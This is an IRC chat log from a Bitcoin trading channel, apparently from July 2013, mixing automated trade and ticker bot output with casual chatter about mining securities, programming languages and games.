06 01:05:47 mp has more than 10,000 followers? Jul 06 01:05:54 i do ?! Jul 06 01:05:56 "I once beat a guy within an inch of his life" "meaning ?" "hes not dead." Jul 06 01:05:59 i think it's a few k's. Jul 06 01:06:20 gotta hit that 10k mark yo Jul 06 01:06:26 then you're truly twitter famous Jul 06 01:06:28 well Jul 06 01:06:33 he could use his btc fortune Jul 06 01:06:36 to get followers Jul 06 01:06:43 lol Jul 06 01:06:47 why do all html5 games look like they were made by bitcoin dev team ? Jul 06 01:06:56 3621 Jul 06 01:06:59 mircea_popescu: bitcoin has a dev team? Jul 06 01:07:37 no, Jul 06 01:07:39 dude you should be thankful to them Jul 06 01:07:40 dev team has a bitocin Jul 06 01:07:59 if it wasn't for all their hard work fucking up satoshi's shiotty code where would we be Jul 06 01:09:08 [BTCTC] [BTC-TRADING-PT] 32 @ 0.8428 = 26.9696 BTC [-] Jul 06 01:12:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.042689 = 0.2561 BTC [+] Jul 06 01:13:21 [BTCTC] [COGNITIVE] 1 @ 0.300001 BTC [-] Jul 06 01:13:23 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [-] Jul 06 01:13:24 [BTCTC] [COGNITIVE] 4 @ 0.289901 = 1.1596 BTC [-] Jul 06 01:14:11 [BTCTC] [TAT.ASICMINER] 7 @ 0.042689 = 0.2988 BTC [+] Jul 06 01:14:18 [BTCTC] [AMC-PT] 25 @ 0.001802 = 0.0451 BTC [-] Jul 06 01:18:01 ;;ticker Jul 06 01:18:02 MtGox BTCUSD ticker | Best bid: 70.22459, Best ask: 70.31131, Bid-ask spread: 0.08672, Last trade: 70.31131, 24 hour volume: 84267.41120089, 24 hour low: 65.42448, 24 hour high: 81.70000, 24 hour vwap: 71.34515 Jul 06 01:18:41 ;;nethash Jul 06 01:18:42 175663.636948 Jul 06 01:18:55 C'mon, by most projections, we should be well past 250 now. Jul 06 01:19:32 ;;bcstats Jul 06 01:19:34 Current Blocks: 244992 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 959 blocks | Next Difficulty In About: 5 days, 5 hours, 5 minutes, and 13 seconds | Next Difficulty Estimate: 24741108.2484 | Estimated Percent Change: 15.9631 Jul 06 01:19:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.042336 BTC [-] Jul 06 01:19:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.042336 BTC [-] Jul 06 01:19:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.042336 BTC [-] Jul 06 01:20:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.042336 BTC [-] Jul 06 01:20:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.042336 BTC [-] Jul 06 01:20:10 [BTCTC] [AMC-PT] 250 @ 0.001943 = 0.4858 BTC [+] Jul 06 01:20:38 [BTCTC] [TAT.ASICMINER] 62 @ 0.0408 = 2.5296 BTC [-] Jul 06 01:20:50 By most projections... Jul 06 01:20:56 furuknap, projections based on what ? Jul 06 01:21:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.042592 BTC [+] Jul 06 01:21:09 The end of the world for Bitcoin mining. Jul 06 01:21:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.042592 BTC [+] Jul 06 01:21:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.0408 = 0.2856 BTC [-] Jul 06 01:21:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.040701 = 0.1221 BTC [-] Jul 06 01:21:36 You mean the crowd in bitcoin-anal/bitcoin-pricetalk who mass-frenzied about prices going to 1000 by the end of the year? Jul 06 01:21:58 ofc Jul 06 01:22:04 Namworld: IT COULD HAPPEN Jul 06 01:22:11 Nah, mostly the crowd that scream "don't invest in mining contracts/bonds because difficulty will be a trillion by next Thursday!" Jul 06 01:22:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.042587 BTC [+] Jul 06 01:22:51 Even my projections, which I thought were optimistic, started with 350 on August 1. Jul 06 01:22:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.042689 = 0.1708 BTC [+] Jul 06 01:22:59 I thought these were the same? Jul 06 01:23:45 [HAVELOCK] [ASICM] 35 @ 0.041 = 1.435 BTC [+] Jul 06 01:23:54 [HAVELOCK] [ASICM] 10 @ 0.04131 = 0.4131 BTC [+] Jul 06 01:23:54 350 in august 1 is optimistic, yes. Jul 06 01:24:05 [HAVELOCK] [ASICM] 5 @ 0.0414 = 0.207 BTC [+] Jul 06 01:24:09 Optimistic on my behalf... Jul 06 01:24:20 [HAVELOCK] [ASICM] 5 @ 0.0416 = 0.208 BTC [+] Jul 06 01:24:21 That would be pessimistic on yours :-) Jul 06 01:24:21 [HAVELOCK] [ASICM] 1 @ 0.042 BTC [+] Jul 06 01:24:22 [HAVELOCK] [ASICM] 5 @ 0.0423 = 0.2115 BTC [+] Jul 06 01:24:23 [HAVELOCK] [ASICM] 5 @ 0.04275 = 0.2138 BTC [+] Jul 06 01:24:31 ;;hashrate ASICMiner Jul 06 01:24:31 Error: "hashrate" is not a valid command. Jul 06 01:24:37 ^^^ Should be implemented Jul 06 01:24:37 [BTCTC] [BFMINES] 2 @ 0.004 = 0.008 BTC Jul 06 01:25:27 you're getting ahead of yourself. Jul 06 01:25:59 350 what now? Jul 06 01:26:24 350th total network hash rate. Jul 06 01:28:24 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0044 = 0.022 BTC [+] Jul 06 01:29:18 "gamers can utilize powerful weapons" Jul 06 01:29:41 it may be interesting to see the people who write bylines for games. Jul 06 01:32:34 this will be a bad week for AM I think Jul 06 01:32:48 mining luck is horrible Jul 06 01:32:56 they have very little hardware sales Jul 06 01:33:13 and won't announce new hw til the 10th or later Jul 06 01:33:41 if they don't do some PR before then, peeps will get antsy Jul 06 01:37:33 oops Jul 06 01:37:36 ;;ticker Jul 06 01:37:36 MtGox BTCUSD ticker | Best bid: 68.97074, Best ask: 69.48500, Bid-ask spread: 0.51426, Last trade: 68.87074, 24 hour volume: 88580.16966553, 24 hour low: 65.42448, 24 hour high: 81.70000, 24 hour vwap: 71.24893 Jul 06 01:37:45 see, my quantitive selling worked Jul 06 01:37:52 I sold some, and now prices are going back up Jul 06 01:38:00 i warned you Jul 06 01:38:21 ThickAsThieves: I did it on purpose Jul 06 01:38:25 hehe Jul 06 01:38:28 every time I sell, prices go up Jul 06 01:38:33 I ended up making everything back plus some so today kinda worked out for me. Jul 06 01:39:16 [HAVELOCK] [ASICM] 10 @ 0.0416 = 0.416 BTC [-] Jul 06 01:41:59 [BTCTC] [DMS.MINING] 1 @ 0.020297 BTC [-] Jul 06 01:44:50 mircea_popescu: what game? Jul 06 01:45:02 huh ? Jul 06 01:45:16 nothing beats this weapon http://imgur.com/vGiE3js Jul 06 01:45:55 lol Jul 06 01:46:09 i dunno, some random game "X is a game in which players can utilize powerful weapons" Jul 06 01:47:23 some games have no weapons Jul 06 01:47:23 What the heck is that? Jul 06 01:47:27 Doom Jul 06 01:47:32 The greatest game ever made Jul 06 01:47:40 I guessed, I meant the weapon. Jul 06 01:47:51 I'm not familiar with the weaponry. Jul 06 01:47:51 the NES Jul 06 01:47:51 oooooh Jul 06 01:47:56 lol Jul 06 01:47:57 the NES Jul 06 01:47:58 you're firing at the enemies with a gamuing console Jul 06 01:48:57 a... NES? Doesn't look like it. Jul 06 01:49:05 The bfg? Jul 06 01:49:17 Big Fucking Gun? Jul 06 01:49:20 9000 Jul 06 01:49:33 [HAVELOCK] [ASICM] 9 @ 0.040001 = 0.36 BTC [-] Jul 06 01:49:43 [HAVELOCK] [ASICM] 11 @ 0.040001 = 0.44 BTC [-] Jul 06 01:58:22 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [+] Jul 06 02:02:53 http://shrani.si/f/1M/XZ/3Q9d0X30/bitstamplol.png Jul 06 02:02:54 [BTCTC] [AMC-PT] 4 @ 0.001943 = 0.0078 BTC [+] Jul 06 02:02:55 hehe Jul 06 02:02:57 fuckin retards Jul 06 02:04:06 oh god... Jul 06 02:05:27 is that them just taking 200 satoshi and charging you a penny in the process?? Jul 06 02:05:32 yes Jul 06 02:06:36 nothing's free. Jul 06 02:12:44 [BTCTC] [ASICMINER-PT] 1 @ 4.249 BTC [+] Jul 06 02:12:51 [BTCTC] [ASICMINER-PT] 1 @ 4.249 BTC [+] Jul 06 02:12:53 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 06 02:12:54 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 06 02:14:21 [BTCTC] [BASIC-MINING] 1 @ 0.178799 BTC [+] Jul 06 02:14:21 its retarded, you cant argue otherwise Jul 06 02:15:12 maybe the paper they printed the page on cost Jul 06 02:18:03 [MPEX] [S.MPOE] 1000 @ 0.00080892 = 0.8089 BTC [+] Jul 06 02:18:16 [MPEX] [S.MPOE] 5150 @ 0.00080893 = 4.166 BTC [+] Jul 06 02:19:45 [BTCTC] [BFMINES] 1275 @ 0.004 = 5.1 BTC Jul 06 02:23:22 is havelock actually a registered company ? the fact i don't seem to find any info onsite is indicating it's not Jul 06 02:25:28 mircea_popescu: have you ever beaten super mario bros. ? Jul 06 02:25:46 i've never played it. Jul 06 02:26:08 and you want to make a video game Jul 06 02:26:14 *shakes head* Jul 06 02:29:10 [HAVELOCK] [HIM] 36 @ 0.35199999 = 12.672 BTC [-] Jul 06 02:30:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.042586 BTC [-] Jul 06 02:32:21 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jul 06 02:34:05 [BTCTC] [ASICMINER-PT] 3 @ 4.100002 = 12.3 BTC [-] Jul 06 02:34:08 [BTCTC] [ASICMINER-PT] 1 @ 4.100001 BTC [-] Jul 06 02:34:10 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 06 02:34:12 [BTCTC] [ASICMINER-PT] 1 @ 4.051 BTC [-] Jul 06 02:34:14 [BTCTC] [ASICMINER-PT] 11 @ 4.05 = 44.55 BTC [-] Jul 06 02:35:21 [BTCTC] [ASICMINER-PT] 5 @ 4.65 = 23.25 BTC [+] Jul 06 02:38:10 lol Jul 06 02:39:31 the princess is in another castle Jul 06 02:40:20 ;;ticker Jul 06 02:40:20 MtGox BTCUSD ticker | Best bid: 69.07884, Best ask: 69.58782, Bid-ask spread: 0.50898, Last trade: 68.90998, 24 hour volume: 89544.16128351, 24 hour low: 65.42448, 24 hour high: 80.89000, 24 hour vwap: 71.18989 Jul 06 02:41:07 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 06 02:42:52 [BTCTC] [BFMINES] 1000 @ 0.004 = 4 BTC Jul 06 02:45:29 [HAVELOCK] [ASICM] 30 @ 0.041 = 1.23 BTC [+] Jul 06 02:50:22 bah who the fuck came up with php's multidimensional array notation Jul 06 02:50:34 Probably Larry Wall. Jul 06 02:52:05 i thought he did perl Jul 06 02:52:23 what's wrong with a[m,n,f] anywya ? why a[m][n][f] Jul 06 02:52:51 [HAVELOCK] [ASICM] 9 @ 0.039801 = 0.3582 BTC [-] Jul 06 02:52:52 [HAVELOCK] [ASICM] 3 @ 0.039801 = 0.1194 BTC [-] Jul 06 02:52:54 [HAVELOCK] [ASICM] 315 @ 0.0398 = 12.537 BTC [-] Jul 06 02:52:55 [HAVELOCK] [ASICM] 673 @ 0.039403 = 26.5182 BTC [-] Jul 06 02:55:09 He did Perl. Then PHP came along, ripped off everything, forgot to include any power, and gave it to newbies who have no idea how to handle even that little power. Jul 06 02:55:53 As to why that notation is such, I don't know. It's been years or maybe decades since I did anything useful in Perl. Jul 06 02:57:16 PHP=Perl without teeth Jul 06 02:57:37 tjere's pretty good reasons why perl uses lists Jul 06 02:57:41 and then pretends they're arrays Jul 06 02:57:57 all those reasons have to do with living before 1990 Jul 06 02:58:41 Indeed :-) Jul 06 03:00:18 I wrote my first programming language in Perl, though, somewhere in the mid-90s. Jul 06 03:00:42 [MPEX] [S.MPOE] 14850 @ 0.00080893 = 12.0126 BTC [+] Jul 06 03:00:44 [MPEX] [S.MPOE] 8000 @ 0.0008104 = 6.4832 BTC [+] Jul 06 03:00:46 It was nice; the only language I've used that understood what you mean, even though you don't know how to phrase it. Jul 06 03:01:02 By 'It' I mean Perl, not my language. Jul 06 03:01:35 what langs do you enjoy working in these days, furuknap? Jul 06 03:02:34 I'm not as focused on language as I am on design. Programming languages, to paraphrase someone far smarter than me, is to programming as telescopes are to astronomy. Jul 06 03:02:54 In short, I choose the language that makes sense for a task rather than choose tasks based on the languages I know. Jul 06 03:03:10 Generally, I spend less time learning a language than I do understanding the problems I need to solve. Jul 06 03:03:27 what problem spaces are you involved in? that's a way more interesting topic... Jul 06 03:03:39 [HAVELOCK] [ASICM] 462 @ 0.040399 = 18.6643 BTC [+] Jul 06 03:03:41 [HAVELOCK] [ASICM] 1 @ 0.0404 BTC [+] Jul 06 03:03:42 [HAVELOCK] [ASICM] 537 @ 0.040499 = 21.748 BTC [+] Jul 06 03:03:51 [HAVELOCK] [ASICM] 136 @ 0.040499 = 5.5079 BTC [+] Jul 06 03:04:25 opinions on bASIC and COGNITIVE? Jul 06 03:04:46 basic still exists ?! Jul 06 03:04:53 These days, I work mostly with SharePoint in programming, and my goals is to get the world to improve the user experiences of SharePoint solutions. Jul 06 03:04:58 yea it's somewhat tanking Jul 06 03:05:06 both are scam Jul 06 03:05:12 why Jul 06 03:05:13 you mean the failed van ryp "asic" ? Jul 06 03:05:30 oh it's furuknap Jul 06 03:06:07 ? Jul 06 03:06:10 [BTCTC] [BFMINES] 9 @ 0.004 = 0.036 BTC Jul 06 03:06:12 did you issue BFMINES knowing full well that achieving ROI is near impossible? Jul 06 03:06:15 [MPEX] [S.MPOE] 6500 @ 0.00081113 = 5.2723 BTC [+] Jul 06 03:06:26 Did you just use the word ROI without knowing what it means? Jul 06 03:06:44 well i use it in the context of making back the principal Jul 06 03:07:30 So, you didn't know what it meant. That's fine, I'll just assume your assumption of the answer is funded on about as much insight. Jul 06 03:07:47 ive read your blog Jul 06 03:08:02 ryan1894 pretty much all mining shit is not going to make its money back. Jul 06 03:08:11 you make ~30% as an average over the past coupla years. Jul 06 03:08:26 is this only dividends? Jul 06 03:09:07 it's whatever you're getting. Jul 06 03:10:26 securities like COGNITIVE and aminer have been profitable though Jul 06 03:11:53 then yuou have your answer right there. Jul 06 03:13:15 [HAVELOCK] [ASICM] 18 @ 0.040301 = 0.7254 BTC [-] Jul 06 03:14:54 [BTCTC] [BASIC-MINING] 9 @ 0.178799 = 1.6092 BTC [+] Jul 06 03:14:56 [BTCTC] [BASIC-MINING] 3 @ 0.1788 = 0.5364 BTC [+] Jul 06 03:14:57 [BTCTC] [BASIC-MINING] 3 @ 0.1789 = 0.5367 BTC [+] Jul 06 03:14:59 [BTCTC] [BASIC-MINING] 5 @ 0.18 = 0.9 BTC [+] Jul 06 03:17:09 [BTCTC] [BTC-TRADING-PT] 2 @ 0.82 = 1.64 BTC [-] Jul 06 03:17:11 [BTCTC] [BTC-TRADING-PT] 1 @ 0.82 BTC [-] Jul 06 03:19:36 [MPEX] [S.MPOE] 9600 @ 0.00081113 = 7.7868 BTC [+] Jul 06 03:24:28 [HAVELOCK] [ASICM] 70 @ 0.040002 = 2.8001 BTC [-] Jul 06 03:25:23 mpoe is the least profitable thing I ever invested in Jul 06 03:25:26 Jul 06 03:27:50 troll forgot to invest in bbet Jul 06 03:30:15 [HAVELOCK] [ASICM] 1 @ 0.0409 BTC [+] Jul 06 03:30:16 [HAVELOCK] [ASICM] 65 @ 0.04129999 = 2.6845 BTC [+] Jul 06 03:36:56 [BTCTC] [S.DICE-PT] 2 @ 0.002498 = 0.005 BTC [+] Jul 06 03:41:43 I used bitbet to create a betting racket in my hometown Jul 06 03:42:08 we bet on teen pregnancies and relationship lifespans Jul 06 03:42:13 :D Jul 06 03:45:34 [HAVELOCK] [ASICM] 72 @ 0.041797 = 3.0094 BTC [+] Jul 06 03:47:14 [HAVELOCK] [VTX] 1 @ 0.97 BTC [-] Jul 06 03:48:24 [BTCTC] [AMC-PT] 1 @ 0.0019 BTC [-] Jul 06 03:52:05 [HAVELOCK] [KCIM] 2 @ 0.871 = 1.742 BTC [-] Jul 06 03:52:07 [HAVELOCK] [KCIM] 1 @ 0.87 BTC [-] Jul 06 03:52:08 [HAVELOCK] [KCIM] 4 @ 0.85 = 3.4 BTC [-] Jul 06 03:53:45 !t h kcim Jul 06 03:53:47 [HAVELOCK:KCIM] 1D: 0.85000000 / 0.89688889 / 1.03000000 (9 shares, 8.07200000 BTC), 7D: 0.60000000 / 0.86876768 / 1.03000000 (65 shares, 56.46989900 BTC), 30D: 0.60000000 / 0.9291314 / 1.16990000 (100 shares, 92.91313990 BTC) Jul 06 03:57:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 03:57:44 [BTCTC] [BTC-GOLD] 2 @ 0.04897 = 0.0979 BTC [+] Jul 06 03:58:38 !t h vtx Jul 06 03:58:39 [HAVELOCK:VTX] 1D: 0.55400000 / 0.77292071 / 0.99800000 (280 shares, 216.41779954 BTC), 7D: 0.47000000 / 0.64328104 / 0.99800000 (559 shares, 359.59410054 BTC), 30D: 0.41520000 / 0.54700949 / 0.99800000 (1200 shares, 656.41139132 BTC) Jul 06 03:59:53 [BTCTC] [S.DICE-PT] 6 @ 0.002498 = 0.015 BTC [+] Jul 06 04:01:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.041099 = 0.0822 BTC [+] Jul 06 04:05:31 [BTCTC] [DMS.MINING] 2 @ 0.020297 = 0.0406 BTC [-] Jul 06 04:05:32 [BTCTC] [DMS.MINING] 5 @ 0.020298 = 0.1015 BTC [+] Jul 06 04:09:14 [BTCTC] [BTC-TRADING-PT] 10 @ 0.9 = 9 BTC [+] Jul 06 04:09:17 [BTCTC] [BFMINES] 15 @ 0.00395 = 0.0593 BTC [-] Jul 06 04:09:19 [BTCTC] [BFMINES] 485 @ 0.004 = 1.94 BTC [+] Jul 06 04:15:11 BTCT struggling... Jul 06 04:18:29 [HAVELOCK] [ASICM] 811 @ 0.041001 = 33.2518 BTC [-] Jul 06 04:24:57 GOOD NEWS EVERYONE Jul 06 04:27:30 And that would be..? Jul 06 04:28:05 I'm being brought up on disciplinary charges! Jul 06 04:28:06 WAIT Jul 06 04:28:11 that's not good news at all!!! Jul 06 04:30:14 What did you to this time? Jul 06 04:33:09 ryan1894: Anyone issuing PMBs is betting buyers of the securities won't make back their principal, or they wouldn't be issuing/selling them. furuknap would have to be an idiot to not be aware that buyers of BFMINE will likely never make back their principle. (The one scenario where it might payback is if btc crashed down to almost nothing and everyone stopped mining, causing difficulty to drop, however he has Jul 06 04:33:09 clause in his prospectus to prevent loss in such a scenario.) Jul 06 04:33:42 (And allowing him to buy back) Jul 06 04:34:20 You may have missed the memo. Jul 06 04:36:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.041099 BTC [+] Jul 06 04:41:31 furuknap: I'll bite. Which memo would that be? Jul 06 04:42:29 1) I'm buying into my own asset. I would have to be an equal idiot to do that, knowing that I would never make my money back, right? Jul 06 04:43:18 2) I already answered your question several times; I'm more likely to get a higher ROI if I have cash in hand than the average investor because I actually follow the market and invest significant time to stay on top. Jul 06 04:43:31 [HAVELOCK] [ASICM] 100 @ 0.040521 = 4.0521 BTC [-] Jul 06 04:44:11 3) If mining stopped, both the investors and I would make huge amounts of money, so the price would skyrocket and the buy-back price would be impossible for me to pay. Jul 06 04:44:33 [BTCTC] [BASIC-MINING] 4 @ 0.170001 = 0.68 BTC [-] Jul 06 04:44:39 [HAVELOCK] [ASICM] 1 @ 0.04052 BTC [-] Jul 06 04:44:40 [HAVELOCK] [ASICM] 224 @ 0.040512 = 9.0747 BTC [-] Jul 06 04:48:31 wow Jul 06 04:48:54 has a bigger load of bullshit ever landed on this channel? Jul 06 04:49:44 [BTCTC] [S.DICE-PT] 44 @ 0.00249 = 0.1096 BTC [-] Jul 06 04:51:00 [BTCTC] [DMS.MINING] 5 @ 0.02029 = 0.1015 BTC [-] Jul 06 04:51:04 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 06 04:52:05 someone might be butthurt :) Jul 06 04:52:34 [BTCTC] [TAT.ASICMINER] 33 @ 0.041979 = 1.3853 BTC [+] Jul 06 04:54:12 [BTCTC] [DMS.MINING] 5 @ 0.02029 = 0.1015 BTC [-] Jul 06 04:55:12 [BTCTC] [S.DICE-PT] 391 @ 0.002499 = 0.9771 BTC [+] Jul 06 04:55:14 [BTCTC] [S.DICE-PT] 1 @ 0.002499 BTC [+] Jul 06 04:56:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.042 = 1.05 BTC [+] Jul 06 04:58:39 I like that insurance idea, furuknap Jul 06 04:59:25 Which insurance idea? Jul 06 05:00:08 For the btc-tc hot wallet Jul 06 05:00:56 Ah, yeah, I think that would make sense. I suggested it to burnside in private a while back, but he gets a lot of suggestions :-) Jul 06 05:01:11 man i wish avalon would ship Jul 06 05:01:50 Yeah, I had some ideas too, but more on the technical side. Not that I particularly need the hot wallet myself, but it was an interesting problem to try to solve. Jul 06 05:08:32 http://www.theverge.com/2013/7/5/4496852/adblock-plus-eye-google-whitelist Jul 06 05:08:36 Google reportedly paid Adblock Plus not to block its ads | The Verge Jul 06 05:09:42 start coding your AdWorss Blocker Jul 06 05:09:47 profit. Jul 06 05:09:57 adwords* Jul 06 05:10:14 what's more dangerous Detroit or Chicago? Jul 06 05:10:22 [BTCTC] [ASICMINER-PT] 1 @ 4.288 BTC [+] Jul 06 05:10:25 [BTCTC] [ASICMINER-PT] 1 @ 4.27 BTC [-] Jul 06 05:10:42 !ticker btctc Asciminer-pt Jul 06 05:10:43 I don't know those people, and they don't look very friendly. Jul 06 05:10:52 !ticker btctc Asicminer-pt Jul 06 05:10:53 [BTCT:ASICMINER-PT] 1D: 4 / 4.27245 / 4.71 (467 shares, 1995.2 BTC), 7D: 3.4 / 4.44531 / 5.17 (5783 shares, 25707.2 BTC), 30D: 2.15 / 3.36094 / 5.17 (18260 shares, 61370.8 BTC) Jul 06 05:25:32 [BTCTC] [DMS.SELLING] 109 @ 0.029699 = 3.2372 BTC [+] Jul 06 05:25:42 [BTCTC] [BFMINES] 50 @ 0.004 = 0.2 BTC [+] Jul 06 05:26:33 chaang-noi, why do you copy what everyone says in your responses? Jul 06 05:27:04 the string to which you're responding, less idiotically phrased. Jul 06 05:29:42 [BTCTC] [DMS.SELLING] 10 @ 0.0297 = 0.297 BTC [+] Jul 06 05:30:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.042485 BTC [+] Jul 06 05:32:24 incompetence, then? Jul 06 05:34:04 [MPEX] [S.MPOE] 800 @ 0.00080825 = 0.6466 BTC [-] Jul 06 05:34:06 [MPEX] [S.MPOE] 11800 @ 0.00080819 = 9.5366 BTC [-] Jul 06 05:34:18 [MPEX] [S.MPOE] 1 @ 0.00080541 BTC [-] Jul 06 05:34:19 [MPEX] [S.MPOE] 8240 @ 0.0008054 = 6.6365 BTC [-] Jul 06 05:35:56 [BTCTC] [S.DICE-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 06 05:40:13 [HAVELOCK] [ASICM] 81 @ 0.040512 = 3.2815 BTC [-] Jul 06 05:40:14 [HAVELOCK] [ASICM] 150 @ 0.04051111 = 6.0767 BTC [-] Jul 06 05:40:16 [HAVELOCK] [ASICM] 54 @ 0.040511 = 2.1876 BTC [-] Jul 06 05:40:17 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [-] Jul 06 05:40:18 [HAVELOCK] [ASICM] 1 @ 0.04 BTC [-] Jul 06 05:40:18 [HAVELOCK] [ASICM] 61 @ 0.039501 = 2.4096 BTC [-] Jul 06 05:40:19 [HAVELOCK] [ASICM] 250 @ 0.0395 = 9.875 BTC [-] Jul 06 05:40:52 [HAVELOCK] [ASICM] 1 @ 0.039499 BTC [-] Jul 06 05:42:44 [HAVELOCK] [ASICM] 7 @ 0.0392 = 0.2744 BTC [-] Jul 06 05:42:46 [HAVELOCK] [ASICM] 1 @ 0.03911001 BTC [-] Jul 06 05:42:47 [HAVELOCK] [ASICM] 10 @ 0.03910801 = 0.3911 BTC [-] Jul 06 05:42:48 [HAVELOCK] [ASICM] 1 @ 0.03830001 BTC [-] Jul 06 05:42:49 [HAVELOCK] [ASICM] 100 @ 0.0383 = 3.83 BTC [-] Jul 06 05:42:51 [HAVELOCK] [ASICM] 157 @ 0.03816 = 5.9911 BTC [-] Jul 06 05:42:52 [HAVELOCK] [ASICM] 2 @ 0.03815 = 0.0763 BTC [-] Jul 06 05:42:53 [HAVELOCK] [ASICM] 3 @ 0.038117 = 0.1144 BTC [-] Jul 06 05:42:53 [HAVELOCK] [ASICM] 50 @ 0.038112 = 1.9056 BTC [-] Jul 06 05:42:54 [HAVELOCK] [ASICM] 88 @ 0.0381 = 3.3528 BTC [-] Jul 06 05:42:55 [HAVELOCK] [ASICM] 1 @ 0.037324 BTC [-] Jul 06 05:42:56 [HAVELOCK] [ASICM] 10 @ 0.037322 = 0.3732 BTC [-] Jul 06 05:42:57 [HAVELOCK] [ASICM] 1 @ 0.03714319 BTC [-] Jul 06 05:42:58 [HAVELOCK] [ASICM] 1 @ 0.0369 BTC [-] Jul 06 05:42:59 [HAVELOCK] [ASICM] 523 @ 0.03663366 = 19.1594 BTC [-] Jul 06 05:44:58 nice Jul 06 05:45:45 [BTCTC] [TAT.ASICMINER] 50 @ 0.041201 = 2.0601 BTC [-] Jul 06 05:45:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.0412 = 0.1648 BTC [-] Jul 06 05:45:49 [BTCTC] [TAT.ASICMINER] 20 @ 0.041099 = 0.822 BTC [-] Jul 06 05:49:53 oh wow Jul 06 05:50:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.042483 = 0.2124 BTC [+] Jul 06 05:51:18 what happend on havelock :) Jul 06 05:51:31 someone added a extra zer0 Jul 06 05:51:59 or someone got hacked? :) Jul 06 05:53:37 or someone wants to cash out Jul 06 05:54:05 yea i accually read them as full AM shares Jul 06 05:54:08 time to go to bed Jul 06 05:54:08 :) Jul 06 05:54:28 [BTCTC] [BASIC-MINING] 1 @ 0.179949 BTC [+] Jul 06 05:56:55 I don't want to tell mircea_popescu how to do his job or anything, but I think it's time to lay on the hyperbole and aggrandizement for ministry of games. Does anyone have any idea how awesome the game is going to be? Jul 06 05:57:34 [BTCTC] [DMS.MINING] 2 @ 0.02029 = 0.0406 BTC [-] Jul 06 05:57:39 [BTCTC] [ASICMINER-PT] 1 @ 4.299995 BTC [+] Jul 06 05:57:42 [HAVELOCK] [ASICM] 2 @ 0.038365 = 0.0767 BTC [+] Jul 06 05:57:53 asswatch depends when. Jul 06 05:57:59 eventually it'll be pretty awesome im sure. Jul 06 05:58:00 [HAVELOCK] [ASICM] 29 @ 0.038498 = 1.1164 BTC [+] Jul 06 05:58:11 Aaand Ciphermine feel 40%... Jul 06 05:58:33 [BTCTC] [S.MPOE-PT] 6 @ 0.00099 = 0.0059 BTC [-] Jul 06 05:58:56 [BTCTC] [COGNITIVE] 1 @ 0.337925 BTC [+] Jul 06 05:59:19 [HAVELOCK] [ASICM] 70 @ 0.038498 = 2.6949 BTC [+] Jul 06 06:02:07 for the huge launch, though, needs embellishment. It has been at least thoroughly researched or something right? The technology is a several steps beyond next generation everything? Jul 06 06:02:49 [BTCTC] [ASICMINER-PT] 1 @ 4.16 BTC [-] Jul 06 06:02:51 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 06 06:08:27 [BTCTC] [S.MPOE-PT] 100 @ 0.00099 = 0.099 BTC [-] Jul 06 06:08:34 what ? Jul 06 06:08:45 [BTCTC] [ASICMINER-PT] 5 @ 4.12 = 20.6 BTC [-] Jul 06 06:08:47 [BTCTC] [ASICMINER-PT] 2 @ 4.1 = 8.2 BTC [-] Jul 06 06:08:49 [BTCTC] [ASICMINER-PT] 3 @ 4.063 = 12.189 BTC [-] Jul 06 06:10:51 [BTCTC] [S.BBET-PT] 20 @ 0.0017 = 0.034 BTC [-] Jul 06 06:12:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.040822 BTC [-] Jul 06 06:12:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 06:12:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 06:12:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 06:12:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 06:13:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 06:13:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.040821 BTC [-] Jul 06 06:13:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.04082 = 0.1633 BTC [-] Jul 06 06:13:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04082 BTC [-] Jul 06 06:13:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04082 BTC [-] Jul 06 06:13:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.040811 BTC [-] Jul 06 06:13:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.04081 BTC [-] Jul 06 06:13:16 [BTCTC] [AMC-PT] 10 @ 0.001941 = 0.0194 BTC [+] Jul 06 06:13:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04081 BTC [-] Jul 06 06:13:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.040807 BTC [-] Jul 06 06:13:22 [BTCTC] [TAT.ASICMINER] 1 @ 